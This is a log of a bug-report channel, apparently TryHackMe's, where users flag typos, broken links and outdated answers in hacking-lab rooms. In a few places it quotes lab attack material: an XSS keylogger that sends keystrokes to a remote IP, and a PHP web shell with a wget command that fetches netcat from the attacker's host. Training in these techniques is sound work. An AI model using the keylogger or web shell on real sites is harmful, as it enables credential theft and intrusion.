#room-bugs

I formulated my statement in a wrong way i guess.

I think the screenshot highlights the whole command so it wasn't as obvious you mean the syntax

Nice catch thanks (: updated

Np

I think in the active directory basics lab, it should be other objects instead of other OUs?

why's that? they can and often do contain other OUs inside of them 🤔

oh ok sorry i didn't know that

Yeah no it’s literally other OUs

you can have OUs within other OUs

Should be Task 7 instead of Task 6, as task 6 was a practical with Gobuster

https://tryhackme.com/room/webenumerationv2

Also each word here is spaced a lot here in Task 8

Same Task and same problem as above very spaced, not sure if it's intended to be typed out like that

Thanks @topaz thorn good catch -- resolved. Re. the text being spaced I can't seem to replicate it O.o

Looks okay to me -- nothing in the HTML code either mhhhhm

Gave +1 Rep to @topaz thorn

Hello everybody, I`m stuck on this question in Physical Security Intro room. And it looks like a bug.

https://tryhackme.com/room/osqueryf8 Task 5: where the username is 3 characters long and ends with 'en' <- the question not match the answer, WHERE length(username) = 3 AND username like ...

Typo in thew new osquery room, task 1 "AlienTvault" (the T)

there is a small error/typo in the new walkthrough room osqueryf8 in task6 http://127.0.0.1:8080 should be https i think =)

pretty sure it's not a bug, did you watch the videos?

Try a different query using the _ wildcard

Good catch. We’ll fix this

Hello, I am doing the MITRE room on task6, the link to APT29 appear to be broken (404).

I’ll let the creator know.

Someone submitted a git issue for this yesterday as well

https://github.com/mitre-attack/attack-evals/issues/34

https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/apt29/Operations_Flow.md

Or from you can check it out from wayback

https://web.archive.org/web/20201101054053/https://attackevals.mitre-engenuity.org/APT29/

Thanks a lot!

No problem. The url was updated

In the "RootMe" room on Task 2 the last question is "What is the hidden directory", and I found one and was able to upload a reverse shell. It keeps telling me that my answer is incorrect though.... Is this a bug??

oh forget it, it wanted the answer in another format...

Can I write a suggestion?

If it's to do with the site then better putting it at https://tryhackme.com/feedback. If it's to do with a room then of course, go for it 🙂

done thank you

there is bug on room DIFFRENT CTF it's can be rooted in one minute..

Is it the overlayfs exploit?

Because if so that affects virtually everything

(but also we have a temporary patch)

yes

AWS will hopefully release an updated kernel soon. Until then, we have a force patch

noted

could it be that the password for the new room is expired ?

osquery?

no WindowsCTF

Ohh

i actually guessed the "correct" one for the thm interface

and if i try it on smb or rdp it gives password expired

ssh does not give much of a feedback even in verbose

Yea I think I may know why, I just pinged one of the admins

Hi guys, following the instructions on Task 7 of XSS Playground seems to crash the server.
I don't know enough to even start suggesting why, but the code I tried is:
<script type="text/javascript">
let l = ""; // Variable to store key-strokes in
document.onkeypress = function (e) { // Event to listen for key presses
l += e.key; // If user types, log it to the l variable
document.querySelector('#cont').innerHTML='<img src="10.10.188.92/log/' + l + '">'; // update this line to post to your own server
}
</script><div id="cont"></div>

WebOSINT room, last question of Task 2: "What country is listed for the registrant?". The answer should be Iceland, not Panama anymore.

Hi, just trying to complete CC: Pen Testing room but it does not accept my answer

use double qoutes

This worked for me

Double quotes didn't work

idk i think it doesnt matter , i did all of them double quotes

Bug bug room bug or maybe not.

i was doing tony the tiger and i couldnt find port 8080 open

but it asks for whats running on 8080

i tried restarting the box still it shows that its closed

ahh its java nvm

It takes forever to boot, yeah

What happens to the forensic rooms.its shows no room

It not shows any rooms

That's a known bug, the site devs are looking into it at the moment

Splunk Task 2 - Splunk forum location still not updated and since it appears to have been requested multiple times: <not-questions-but>.splunk.com ---- hint for anyone digging like me stuck on an outdated question without any hint as a roadblock to actually getting to course content.

Directed to report a Literature bug on:
/room/bpsplunk:
Task 2 Can you dig it?

Answer Format: ******```
The word 'rename' should likely replaced with a more accurate word like 'locate' to avoid confusion. Thank you!

Room Link : https://tryhackme.com/room/attacktivedirectory
Room Name : Attacktive Directory
Task 6a : Using utility can we map remote SMB shares?
Hint : man tool_name will tell you a little bit about the tool!
Answer : it is a tool name

But look at the question now it didn't ask for the tool name
Question would've been
Which utility can we use to map remote SMB shares.

it's on my to-do list to completely renovate that room

Hello, I'm currently doing the "Linux PrivEsc" room and I think that the validation of the field in question 3.1 (root flag)
has a problem.

I have the right flag, after checking the write-ups because I have questioned myself, is the problem known? I have the flag if a
moderator wants to check.

Hello I am trying to do the Isac room task 8, but the password is not accepted for the RDP

the forensics rooms bug is not fixed.it still make troubles

?

anyone else having major problems connecting to anthem? RDP freezes pretty fast after successful login, connections via tools like winexec drop or timeout. Checked internet speed, 80 mbps should not be the problem. VPN is active

I am using remmina with kali attackbox, if it should work i will try from windows via vpn

other THM machines work flawlessly, stable and fast connection via RDP (rdesktop). Just anthem is slow as hell

Hi, just completed Yara, the sixth question in Task 11 doesn't accept what I think should be the correct details as per Valhalla. Really minor thing but maybe worth a look?

DM me a screenshot of what you believe to be the correct answer, please?

Tim- someone was asking for more power in the other channel earlier. Was SO tempted to ping you.

#room-help message

Thank you for reporting this. 🙂

Gave +1 Rep to @harsh nimbus

heyy, is it possible that Physical Security Intro room does not accept correct answer?

unlikely, I completed the room, some of the answers were definitely not obvious however (to me at least and I saw a few others with issues when I was googling around)

if you want some hints I can provide some better ones if you ask in room hints

Ok, thanks. I need to dig deeper I guess then. Just what I found fit perfectly to answer format, haha, but apparently is not correct 🙂

Gave +1 Rep to @oak mica

yeah unfortunately I have to say the actual answers were more 'wow ok' than 'oh I finally understand'

Yes, they are not obvious/easy, definitely 🙂

broken image on task 5 (under domain policies overview) in throwback room

This answer should be right if I am not wrong. MIRTE room; task 6 ; question 3;

Examining APT29, what 2 tools were used to execute the first scenario?

answer: Pupy and Meterpreter

Answer is correct @wheat fractal

doesn't seem to work..

Nevermind I was wrong.... Answer is not correct

ahw damm

What is meterpreter a part of? 🙂

metasploit hahaa

oh damm

for real 😂

So I'm not sure if this is the right place to report it as it is not a room bug per-say but yesterday i got done with the Mr Robot CTF (https://tryhackme.com/room/mrrobot) and I had to use the walkthrough as I'm still quite new at this whole thing. Anyway, there's a point in that challenge where one has to decrypt a raw md5 hash of password. The video walkthrough uses this .dic file that is provided by the room as the wordlist. However. That list does not contain the un-hashed password. Crack station or similar sites will have it but the walkthrough explicitly shows a command that uses John the ripper, something like john hash.md5 wordlist=<file>.dic which will NOT work. Did I miss something or is it just a bit missleading?

That's more a bug in the walkthrough than the room itself. Perhaps the room changed after it was written. Generally, the writeups are made by people other than the room creator

I believe in this case it was the author of the room, DarkSec. But I would agree, the issue i had is with the walkthrough, not the room.

The room is unlikely to have changed

On the room "Network Services" at Task 9 on enumerating the FTP, the first question How many ports are open on the target machine?. The answer appears to be 2 while doing an Nmap shows only 1 port open

As @cedar grail said, theres a bug with Linux 3: https://i.imgur.com/9DnmOG9.png

Should be they're not their

it's literally in the first line (linux3)

Edited!

I was doing the owaspjuiceshop room In task-4 Q1: I am not able to get the answer. it is not showing up. can someone have a look?

Did you run nmap on all ports, with -p-?

Fixed. Thank you for reporting. 🙂

Gave +1 Rep to @woven pawn

i got no rep

thanks @cedar grail

Gave +1 Rep to @cedar grail

https://i.imgur.com/f3ncKsA.png
Another one, not sure what this one is supposed to be though

https://i.imgur.com/QG9uYwC.png
And another one

Yes I did

Hi, I don't if it's a bug or the steps to escalate privilege has changed

This is regarding task 18 - Accumulate of room Advent of Cyber 1 [2019]

I was going for the 3rd question.
Elevate privileges and read the content of root.txt
after banging my head for 1 hour, trying to understand how to go about it, I finally decided to give up and looked for a writeup

the writeup says that we have to search in the google chrome history, but to my surprise, when I logged into the machine, google chrome was not even installed.

I terminated and started the machine again, and still the same issue.

Is this a bug, or the process for this sub task has been changed?

It was replaced with Blaster

Which is a slightly modified version of the box which makes the vuln even easier to exploit

Blaster?

A different THM room

It was originally Retro

it was still retro

I am talking about the room Advent of Cyber 1 [2019]

It was changed to blaster.

They're 99% the same

so im on windows priv esc and im on task 3, when i try "net start daclsvc" it throws a error
"Invalid command: net start
"
then a usage manual

In Blaster https://tryhackme.com/room/blaster there's similar bug.
Task 3, question 1. It says to look into the browser history to find out which CVE was researched on this computer. When I've looked up the history, there was nothing like that. In the end I have checked the walkthrough, and there, in the browser history was a record of a CVE search

This is a screenshot of the accessed machine https://ibb.co/sFXk2gb

hi. Went back to finalize the Enterprise room, but now it tells me that the user password has expired. I am pretty sure this is not by purpose as it worked the last time I worked on the room.

https://tryhackme.com/room/enterprise

Room network services 2 Task 6.
The msf module does not working on msf6 but does work on version 5.
Seclists package is not included in attack machines and can't be installed.

Seclists is already on the attack box, just a slightly different path

Which user accounts password expired?

bitbucket

interesting. I'll look into it later today. Thanks for reporting

thanks.

@dusky junco @lucid oasis if either of you are available, would it be possible for you to clone a running instance to my account?

IP is 10.10.160.91 machine title is Enterprise v1, new machine title will be Enterprise v2, save to: Sq00ky

Cloning now - How much GB does it need?

Ping me again when you reply - otherwise I'll miss it

currently it's running 2GB

I'm on VIP -- but I know the machine needed a resource bump to begin w/

Sorry I mean storage space?

23GB in use, 60GB total, 37 free

nice - cloning with 30

Added to your account, wait 20 minutes before trying to deploy

awesome, thank you! ❤️

was the enterprise room problem fixed?

It should be as long as nothing went wrong with the instance cloning.

yes works.

quite slow startup so initially I thought the passwords etc were changed

gotta love Windows

working on privEsc now

ping me if you encounter any other issues

it should be smooth sailing from there

yeah worked. just finished

intro2windows task 3 spelling error 3rd question assings > assigns

Fixed. Thank you for reporting. 🙂

Gave +1 Rep to @hallow depot

In "Hacking with powershell" a "wrong" answer is accepted.
I missed a "t" in Installer and it accepted.

Answers have a tolerance of "wrongness" so you can misstype things slightly and it will accept it. This is for various reasons, if u refresh the page the correct answer will appear.

Okay. Didnt know that. Interesting. Thanks

Gave +1 Rep to @vast cypress

https://tryhackme.com/room/xss
Task9 last paragraph XSS-Payloads.com is not accessible anymore.
Last recording of the original site is https://web.archive.org/web/20201229164253/http://www.xss-payloads.com/

Looking for help. In the Authenticate room, Dictionary attack section I'm not getting any results for Jack's password through Burp OR Hydra. I've looked at both the walkthroughs and I'm doing everything right, I'm just not getting any results. Anyone have any ideas?

I'm calling this a bug as I cannot find any information or solution as to why this problem is happening. On the Burp Suite room I am supposed to capture a response with the "Set-cookie" heading. For two days now, no matter what I do on the web page (from just browsing to creating and logging into an account all the way to "buying" something) I cannot get the set-cookie flag. Some other things I have tried; allowing third party cookies in firefox, refreshing multiple times with both the refresh and ctrl f5, disabling ublock and privacy badger, using the filter option to make sure I just wasn't missing it.

Are you seeing requests with Cookie?

yea lots, I see cookie and cookieconsent but no responses

Moved to #subs-room-help

Hi. I have a weird problem in the "Tutorial" room. If I press the "Join room" button, I get redirected to the "How to use TryHackMe" room, which I have completed earlier. (Of course there is no real reason to do the "Tutorial" room for me, but it would be nice to complete it to get rid of it being at the top of Hacktivities sorted by "Most popular")

I think I found an error with the flag provided for OWASP Juice Shop / Task 5 / Question 3 | The flag appears to be incorrect even after visiting the scoreboard page and re-prompting the toast notification

John the Ripper is showing ssh2john as python3 script, I don't think it has been updated to that yet

or may just want to make a note that older script is python2

Hi, not sure if this is a bug, but i just joined room OhSINT and i am trying to download the picture on this room, but seems that its just jpg should it be like that ?
shouldn't it be like picture.jpg ? or its a catch ?

nvm

Not sure if this qualifies as a bug
Volatility room: downloading with apt-get install volatility as suggested on a kali machine outputs an error: Unable to locate package volatility
Downloaded from https://www.volatilityfoundation.org instead.

Enumerating FTP room the machine for that isn't populating an IP: IP Address Shown in 00s

I've restarted it like 6 times so far

It's a site issue

💔

How long is it gonna take to fix this ip thing?

No one could possibly know

It was working like two days ago so I hope it will be back up soon.

A fix is being pushed as we speak ((: just need to wait for it to roll out to all the servers

😀

hello, room: https://tryhackme.com/room/rpmetasploit
I can't go further at the end because the command is not working.. 😦 I saw the video for help but for me its not working...
"Additionally, we can start a socks5 proxy server out of this session. Background our current meterpreter session and run the command search server/socks5. What is the full path to the socks5 auxiliary module?"

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(windows/http/icecast_header) > search server/socks5
[-] No results from search
msf6 exploit(windows/http/icecast_header) > search server/socks4
[-] No results from search
msf6 exploit(windows/http/icecast_header) > search server/socks5
[-] No results from search
msf6 exploit(windows/http/icecast_header) >

does anyone can help me with this?

just search for socks5

auxiliary/server/socks5 is the path answer

thanks but I cannot understand why the search is not find anyting

I just took a look, its been a long time since I did this room, the basic answer is its not finding it because there isn't anything called socks5 in there! Maybe it was renamed? If you search on /auxiliary/server you'll see everything on that paths. There is SOCKS, but no socks5, so this is why. I guess the question needs editing, perhaps this is a change in msf6

That room is a little outdated. The modules have changed names

I see thank you!

you're welcome

Hi guys, I need help. I have successfully completed all questions under except one in the room of OWASP Juice Shop.

Question found in Task 5: AH! Don't look!
Question #2: Log into MC SafeSearch's account!
Answer I found: b03f4b0ba8b458fa0acdc02cdb953bc8

I have successfully hashed the password. But it doesn't accept my answer when i click on submit.
Please assist.

@eternal summit the flag filename and what you have in the question are not the same for the OverlayFS room

Fixed

OWASP Juice Shop room, I can't seem to get the flag to generate after accessing the admin account like it said I should.

Okay so this is weird. I opened two browsers; one is firefox where I am on the juice shop site and capturing with BurpSuite. The other is LibreWolf where I have the tryhackme page up. I tried bringing up JuiceShop in LibreWolf. I then moved on to accessing benders account. I accessed the account on the firefox browser but got the flag on the librewolf browser.

No matter what I try it simply won't give me the flag for logging into the admin's account. I'm really not sure what I'm supposed to do here

repost from #site-bugs :
I guess the issue already been reported but I really want to do this room so I wanted to report that the "learn Rust" room isn't loading

Not really a room bug, as it's a site bug like I said.

Hey! Not really a bug, but maybe an oversight. In Linux part 3 in task 7 we should make a directory and file, but they are already there. Also, what happen to the tiny hacking task at the end of Linux 'path'?

I'm wondering if maybe the flag is being intercepted by burp. iirc, those flags are essentially popup messages that are triggered when you use the exploit, so that data has to come back to the browser.

guys the room splunk has bug, when i open firefox and put ip:8000 to see the webserver it say no connection

are you on the deployed machine

@civic brook yes and i run the box

The IP of the attackbox, or of the deployed machine?

Room: Investigating Windows. Question: 10

you need to be a little more specific -- what is the bug?

The answer formats. One says one thing, the other another

In burpsuite room task 6 which web application hosted on VM its talking about to complete the task?

The one that you deploy in the room with the button that says "Start Machine"

The IP will be shown under Active Machine Information

Copy the IP address of the machine you deployed into an address bar (I think)

I believe this may be a typo in the "Attacking Kerberos" room

Why do you believe that?

You sure you're not going between two domain admins?

That makes sense. Maybe it could say something like "from a domain admin to another domain admin" to clarify. Just a thought

As a general rule, don't try to make @twin tapir use good English

It rarely ends well

Haha fair enough

No because that wouldn’t be true... you would straight up be escalating from domain admin to domain admin kekw

That's... what you said above?

Exactly

Is it not between two different DAs?

Nope

So it's between the same DA?

Cryillic, that makes no sense you Goober

Go fix

moving horizontally from one domain admin to another

See, that makes sense

Moving from one domain admin to the same domain admin, does not

That would be one heck of an exploit to be able to do that haha

You see, I thought that, but

That’s why it’s not mentioned in the room

YOU JUST SAID IT WAS

Haha maybe I shouldn't have mentioned it 😅

Muiri vs Cry, mortal kombat style.

I think we all know who wins that one

🍿

I just wanna see finishing moves, tbh

It seems that was correct. I turned intercept back off before forwarding and got the flag. I thought I was turning it off fast enough but apparently I wasn't.

The hacking with powershell room does not give the option to open a windows machine only linux which is useless. Anyone else have that problem?

Hey, Windowseventlogs Task 2, Question 2 needs a tweak, can I DM THM staff please? My mistake

Please just report the issue here

Essentially the answer accepted is NOT the first event

OK, ignore me - I'm an idiot today 🙂 Just need to remember the difference between first and latest!

you're fine dude, don't sweat it

hi guys

I think the MAL: Malware Introductory VM is bugged

I cant connect to it

I've been waiting more than 10 min. and it doesn't received ICMP packets

neither RDP conection

have you tried without giving it a domain?

Ok now it launched

sorry

13 min. later but I got it

sorry if I bother you 😦

It could still be a bug, though 😄

The instructions do show the ANALYSIS-PC as domain, but it does not work with it. It only works without it

Remote Tryhackme ? Whats that?

it worked with it

huh. It didn't work for me

You shouldn't be touching that login, ideally you shouldn't be seeing it either.

Try SSH instead

Hi. The avengers room https://www.tryhackme.com/jr/avengers seems to have a problem. It doesn't load (just shows the loading circle) while all other rooms I try seem to work fine

Hello! Just wanted to notify whoever handles content updates that the MITRE room, Task 7 last question uses ATT&CK Framework v8.2, which is no longer live as of April 28th. Current version is v9

adventofcyber2 task 11 answerable question 1
not sure if its a bug but the answer format does not match the actual answer

question is "What vulnerability type was used to exploit the application?"
also cant show picture because I already submitted the answer but im completely sure the answer format does not have = * to the actual answer

Lots of rooms need the update by forking perhaps?

*Old rooms vulnerable for the CVE-2021-3156 Baron Samedit

I just root one

It's a lot of work to go back and patch rooms, you either need to patch and reupload, or get the admins to spin up an instance with internet access.
I don't see how forking factors into it.
Unless THM paid the creator for it, the creator retains all their rights to the content.

Ahh, didn't see that coming Unless THM paid the creator for it, the creator retains all their rights to the content.

You're only really cheating yourself.

i did know how to root that one.

than i decide to try something new

There's quite a few rooms with unintendeds, whether they've existed since release or a CVE in the kernel or Sudo.

Room was deleted, but still the manage link is working
why ?

room not deleted, but private/archived? You can go into by going to your rooms. https://tryhackme.com/rooms

Unless they mean a room they created, which seems likely given /manage/

its a created room

Probably a site bug not a room bug, #site-bugs

I tried deleting the material, then it showed it as attached to a task
The room was still there on the old link

Again. Probably a site bug.

What's the answer you had in mind?

https://tryhackme.com/room/intro2windows

Super silly perhaps, but:

"Windows comes equipped with two command-line tools:

• CMD
• Powershell
• Windows Terminal"

Emphasis is mine. I think Windows indeed comes with CMD and Powershell; Windows Terminal is open source project by Microsoft, but I don't think it comes equiped with every install.

I think it's great to include that, but then the 'two' should be 'three' 🙂

I changed it to Windows comes equipped with two command-line tools (and one can be installed). Thank you for reporting. 🙂

Gave +1 Rep to @grim harness

Yup, same issue, there is no history for the task 3 q 1 on the Blaster room

room: https://tryhackme.com/room/eritsecurusi - task 5 - typo
we create c.php but after creating we're using cmd.php which can't be found.
creation: echo '<?php system($_GET["c"]);?>'>c.php
using file: http://serverip/files/cmd.php?c=wget http://yourip:8000/nc

Answer I had in mind was a 4 word answer, answering format is 3 words, answer that was correct for me was ||stored cross-site scripting||. Also for the following question in the same task it says "how many xss alerts are in the scan" and answer is ||2|| . But I'm sure I got 9-10 total XSS alerts from the scan, possibly could be worded wrong. 2 of them were post requests and the rest were get requests, so maybe the question should be changed to "How many post xss alerts are in the scan" or something like that

hello.
room: https://tryhackme.com/room/rpmetasploit#
task: 7
command from subject: search server/socks5
expected: auxiliary/server/socks5
msfconsole result: uploaded

not a bug just probably worded wrong as socks5/socks4a are both implemented as a version number and you choose between the two so the msf is just auxiliary/server/socks_proxy

ok. thanks

Gave +1 Rep to @hallow depot

np

um i got Security Groups Wrong but got ecurity Groups correct.

that's the answer tolerance :)

if you refresh the page, the right answer will show

it's designed to be a little lenient, to account for spelling errors and such

@worthy pasture you haven't deployed it by the sounds of things.

There should be a box at the top of the page displaying the IP if you clicked the big green "Start Machine" button in the first task

Hi, page two of the "Learn Rust" room does not load for me.

Narf, I closed the tab while I was waiting on something to happen on page two and now I cannot access the room at all. It's loading endlessly 😄

Hello Everyone! New here. Going through Linux Fundamentals Part 2 (https://tryhackme.com/room/linux2#). Currently at Task 3. Seems like I can not do SSH or even ping the machine. Have tried to start machine and terminate it multiple times. No other machines are running. Is this a known issue or I'm doing something wrong? Thanks in advance!

Are you using the attackbox or a VPN?

attackbox

I just finished linux2 and it worked without an issue. Please doube check you have no other VMs running by going through the other rooms: https://tryhackme.com/rooms and then also make sure you're using the correct IP to connect to.

Yes, confirming, it was my issue. It works fine now. Thanks @craggy agate !

Gave +1 Rep to @craggy agate

Cool, have fun!

Yep that was it, I had started and came back to it later.

Well fixed! 🙂

Again a really small one: https://tryhackme.com/room/activedirectorybasics there's a sentence that really ought to be 2 sentences:

"The type of trusts put in place determines how the domains and trees in a forest are able to communicate and send data to and from each other when attacking an Active Directory environment you can sometimes abuse these trusts in order to move laterally throughout the network."

There should be a period after 'each other' and a capital When.

"The type of trusts put in place determines how the domains and trees in a forest are able to communicate and send data to and from each other. When attacking an Active Directory environment you can sometimes abuse these trusts in order to move laterally throughout the network."

where is room - help

am I get kicked ??

No, you have not been

ok I can't see it anymore

did the "support" section get collapsed/some channels got hidden?

Click this arrow and all the channels will appear

so this is impossible because scylla.sh got taken down and moved to scylla.so but scylla.so isnt functional as of rn, this is Advent of Cyber 2 task 19 day 14

i have tried way back machine once but, it was quite messed up

yeah idk I tried waybackmachine but still dont know lmao I just found it by googling which is basically osint

we love relying on external resources lol

its in the blood.

there is another website I used https://breachdirectory.tk/

In the Lian_Yu room the vid is no longer there

Can I pm any admin regarding the broker room? I think there might be an unintended way to privilege escalate to root.

Is the ISO27001 room being reviewed for grammar mistakes? I checked the channel and they mention quite some errors but they haven't been changed as of yet (dated Feb/Mar)

You'd want to talk to the room creator most likely, admins are more site based

Ok

https://tryhackme.com/room/mrrobot
pages like ||/robots|| are delivered instantly but pages like ||/wp-login|| take about 3 min to be delivered, it's so long that I thought that it was a rabit hole with an intended timeout. The box have been launched an hour ago so it's not like the service have no tarted yet.

Oh, I think it was probably my ffuf that was DoSing the php server, the VM is not very resilient and very resources limited.

Wordpress is slow.

As a general rule.

I stopped my ffuf but the VM is still slow 😦

That will be painful as some BF is intended.

https://tryhackme.com/room/xxe / Task 3
element is in <code> instead of body

https://tryhackme.com/room/ssrf / Task 1
server-side forgery request instead of server-side request forgery

In Room : Introductory Researching : (https://tryhackme.com/room/introtoresearch)
IDK if this is significant enough but, there is a small error(now) as "fuelcms" is written as "fuel cms"(with the space in the middle)

SO it makes sense to update it in the room

@obsidian kiln

afaik the results the same if you were to put "fuelcms" but I'm just checking now ((: if it doesn't I'll update

mhh yeah seems to give different results -- I'll put both suggestions i.e. searchsploit fuelcms & searchsploit fuel cms

i swear searchsploit updated their search to be more regexy and find exploits easier

I also swear, but half the time when I go try to search with it, it never works

Fixed. Thank you for reporting. 🙂

Gave +1 Rep to @ruby swift

Fixed as well. 🙂

Wrong video for the room dogcat

Hello, I belive there is a mistake in the vulneversity room

shouldnt it say Go to payload, select the extension files we just created

then go to "position", select Sniper mode and ....

maybe its my Burp version but in mine Payload is to select the file and position to select the mode and the selected word to fuzz

thank you for looking into it 👍

Gave +1 Rep to @dusky junco

Adventofcyber2 day 24/last day "- - Download build-alpine on your local machine via the git repository" git repository links to - - https://github.com/lxd-images/alpine-3-7-apache-php5-6 instead of https://github.com/saghul/lxd-alpine-builder although it isnt needed to answer the questions since the machine already has an lxc image container on it

Hey, not really a bug, but in Burp room there is a link to other room which is not available anymore ('Owner has made this room private'). Task 9

Typo/poor wording in room commonlinuxprivesc, task 6: "...write access to the /etc/passwd must only limit for the superuser/root account." This should probably be something more like "write access ... should only be allowed for the ...root account"

Hey, page 2 of the "Learn Rust" room does not load at all. https://tryhackme.com/room/rust

owasptop10 room is paid now ?

Found a text bug in the uploadvulns room task 3 https://tryhackme.com/room/uploadvulns

"can extremely be very helpful" should be "can be very helpful" or "can be extremely helpful"

In the Corp room it takes ages to type into powershell, compared to cmd

This problem persists even while starting powershell as cmd's child process

To add on to its slowness, the administrator password is expired and requires to be changed upon logon, which is a very lengthy task looking at its high complexity

A very minor bug (?) in the "Linux Strength Training" room. The last question in the "Working with files" only works if the moved file is in the current directory, while the instructions ask for it to be put in the same directory as the script. (E.g. if the file is moved to the directory, but then the script is run with ~/xxx/yyy/zzz.sh it fails with "... not in this directory, please move it to here" as the script checks the current directory (with test -f "$FILE")

https://tryhackme.com/room/webenumerationv2

Room: Web Enumeration
Task 4: 1.1. Gobuster Modes

• Using "dns" Mode

gobuster dns -d http://mydomain.thm ...
is wrong. You don't need http:// when dns mode.

correct:
gobuster dns -d mydomain.thm ...

In room https://tryhackme.com/room/jvmreverseengineering the images in the tasks are missing

That looks like an interesting room. Judging by the creator's profile, I'm going to guess he/she isn't active enough to fix that. I don't know who/how that gets handled

I think there is a minor error in the new tshark room

?

the final 2 questions.

If you filter the DNS outout two of the letters in the result are swapped

Worked when I submitted it

yeah except when you put it through cyberchef the flag is not 100% correct.

the tolerance lets it go in

the B and Q next to each other in the string

In the room https://www.tryhackme.com/room/malresearching the last image under "Checksums 101" is the same as the first image, and seems to be wrong

there is an issue with task11.6 of Yara ROOM any maintainer of this room here ?

it seems that the highest rule match per month moved recently 😄

the old answer is no more true 😄

@hazy hinge & @dusky junco that's probably for you ...

Which link are you referring to?

I've added this to the problem list. 🙂

It's a free room. 🙂

The original sentence is grammatically correct according to both Grammarly and ProWritingAid. 🙂

It's certainly confusing and clunky

(It's also a 3AM mistake. Fixing it)

Fixed. Thanks for reporting @coral shadow 🙂

Gave +1 Rep to @coral shadow

Muiri, you should make it clear at the top of each room that you created it. So I can read the text in a Scottish voice. 🙂

Fixed. Thank you for reporting. 🙂

Gave +1 Rep to @trail bramble

Added to the Problem List. Thank you for reporting. 🙂

hey Tim, while you're here

I'd be willing to volunteer some time to fix some of the easier/"low hanging fruit" type stuff

not sure how useful that would be, but 🤷‍♂️

Can you please provide a screenshot of the newest rule match? Is it 2021/4?

That's great! Feel free to post them in here regarding your findings. 🙂

I also meant from a room creator/editor perspective. Not sure what your backlog of issues looks like or what it takes to resolve them

New rooms go through a room testing phase, which is handled by the marvelous room testing team. Issues for released rooms get fixed on a reported basis; mostly from reports in this channel, but also based on other room metrics that we gather. Periodically room content gets reevaluated and redone. 🙂

We really appreciate all the reports we get daily from users. I think it is vital to have that type of feedback from our users. User feedback is a vital part of Content Quality. 🙂 ♥️

and a good qa tester 😉

Bah, who needs testing, just ship the beta and let the users do the testing 😉

(no, I'm not really a product manager)

See, my metric matrix can show 99.8 score for all rooms, but that number means very little if user feedback says otherwise. 😄

It probably would mean I would be gathering the wrong metrics. 😉

They say you can only optimize for what you track, and most people track the wrong things 🤷‍♂️ . Not trying to be snarky, just a common software engineering axiom. I think this place is great (obviously)

That's very true. That's why Agile is more useful (to some extent) as it is user-stories based. But if you have user-stories that don't align with what the customer wants, you're still dead in the water. hehehe

very true

I think every software dev has learned that lesson a few times

Probably one of the more honest books on Agile (iterative) development (and quality) is: Clean Agile: Back to Basics by Robert C. Martin. I highly recommend it before reading any other Agile book. 🙂

I've read that, actually, but it's been quite a while. I think I've read a couple other books from him too

My favorite is: Reasonable expectations: QA Should Find Nothing hahaha

lol. Should, perhaps. I've never, EVER seen that happen in reality

The link which says "For some additional practice on using Intruder, check out the older Learn Burp Suite room here on TryHackMe", task 9. Line above last in text. https://tryhackme.com/room/rpburpsuite

When you refresh the page, does it show /room/learnburp? Because that is what I am seeing. @wheat fractal

I see this:

I am subscriber, if it makes any difference.

Aah, now I see what you mean. Yeah, the room learnburp has been set to private. I will inquire why that is with the room creator. Thanks for reporting. 🙂 @wheat fractal

Gave +1 Rep to @torn bluff

You're welcome. Thanks!

Gave +1 Rep to @glad badger

Thanks!

Gave +1 Rep to @glad badger

Don't know why I was getting you Have to be subscribed to spawn this machine. I logged out & logged in again then everything was fine don't know what happened there🤷‍♂️

Hi guys in the OWASP top 10 room in task 7 I succesfully logged in as darren and see the flag. It only doesn't allow me to copy the flag which means I have to type to whole flag manually. I could also just be making a mistake but who knows.

is it on the web page?

yeah

you can view page source and copy

already just typed it over but that would indeed be easier xd

thanks for reporting. the answer was updated.

Gave +1 Rep to @strange crow

Hi, not exactly a bug - just an update to msf causing some issues for user's running their own vms. "Learn to use Metasploit" room, Task 7 , Q 2, due to msf changes from 20th Jan: "PR 14566 - Removed the auxiliary/server/socks4a and auxiliary/server/socks5 modules from Metasploit. Their functionality is now combined into a single module, auxiliary/server/socks_proxy, to prevent code duplication." - providing the correct answer is not possible when not running attackbox.

The room is just a little outdated at this point, but I was able to figure out the answer from the format hint, so it doesn't completely break the room.

Hi everyone! I think there may be an issue with the https://tryhackme.com/room/networkservices room. For task 9 on Enumerating FTP, the attached target machine does not appear to have all expected ports open. Writeups I've seen state that it should have tcp/21 and tcp/80 open. I've opened the machine a couple times, and can only ever see tcp/21. This causes an issue with the first question since it's asking for the number of open ports.

It takes forever to start that service

Ahh I see. Thanks for the heads up! I double checked since I still had the machine running. Looks like it's there now. Just need to be a bit more patient 😅

It takes time to start up fully

oh sorry

but the other subdomain works well

Ok.

I tried starting the machine for tomghost(free room) and it said "You need to be subscribed to start this machine"

After refreshing the page, it worked tho.

I've seen this cropping up a few times, perhaps worth investigating cc @dusky junco

Not just this room

Hi, I am facing a problem in Task 7. Juice Shop

Question 2

I did the persistent XSS but it's not giving me the flag.

@eternal summit

Please don't just ping me because you want help. Everyone here is a volunteer.

Please go and ask in #room-help

ooh okay, I did not know that, I am sorry.

It's a bug, I already solved it, I don't think room-help would be able to help me

But anyways I'll try.

Ok then report it here. No reason to ping me here tho.

I said I am sorry, will take from next time

└─# ls
CHANGELOG.md LICENSE README.md Rubeus Rubeus.sln Rubeus.yar

Attacking kerberos room

required "Rubeus" doesnt run on kali :v

even on their screens they are running windows

Yeah.

You run it on the target machine.

oh i got it i need to ssh into their windows machine and from there attack :C

ye thanks

Gave +1 Rep to @eternal summit

ok rip

now i am on Windows Server v1.1
and i cant run PowerView.ps

PS C:\Users\Administrator\Downloads> . .\Downloads\PowerView.ps1
. : The term '.\Downloads\PowerView.ps1' is not recognized as the name of a cmdlet, function,
script file, or operable program. Check the spelling of the name, or if a path was included,
verify that the path is correct and try again.
At line:1 char:3

• . .\Downloads\PowerView.ps1

• + CategoryInfo          : ObjectNotFound: (.\Downloads\PowerView.ps1:String) [], CommandN  
  

otFoundException
+ FullyQualifiedErrorId : CommandNotFoundException

like WaT

#room-hints but your path is incorrect there

i am dumb, thanks i had to cd .. first

Gave +1 Rep to @eternal summit

In the tshark room, the file downloads as .cap, is this intentional?

Typo in https://tryhackme.com/room/crackthehashlevel2 , Task 4

🤣

It's a site bug ATM

ok

is anyone getting very poor performance on vulnnet internal

it hangs for a few minutes at a time every few minutes

https://tryhackme.com/room/zthobscurewebvulns / Task 14
generated (RS256) jwt gives the flag by default

• by providing this, a user might miss out the challenge which is generating a (HS256) jwt signed with the /public.pem file with the use of openssl and python

